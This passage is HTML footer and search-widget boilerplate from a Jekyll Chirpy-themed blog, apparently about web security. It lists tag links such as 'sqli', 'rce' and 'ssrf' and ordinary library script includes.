by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/command-injection/">command injection</a> <a class="post-tag" href="/tags/sqli/">sqli</a> <a class="post-tag" href="/tags/lfi/">lfi</a> <a class="post-tag" href="/tags/file-upload/">file-upload</a> <a class="post-tag" href="/tags/rce/">rce</a> <a class="post-tag" href="/tags/ssrf/">ssrf</a> <a class="post-tag" href="/tags/ssti/">ssti</a> <a class="post-tag" href="/tags/aws/">aws</a> <a class="post-tag" href="/tags/awscli/">awscli</a> <a class="post-tag" href="/tags/dns/">dns</a></div></div></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/lozad/dist/lozad.min.js,npm/clipboard@2/dist/clipboard.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/dayjs@1/dayjs.min.js,npm/dayjs@1/locale/en.min.js,npm/dayjs@1/plugin/relativeTime.min.js,npm/dayjs@1/plugin/localizedFormat.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.bundle.min.js"></script> <script defer src="/app.js"></script>
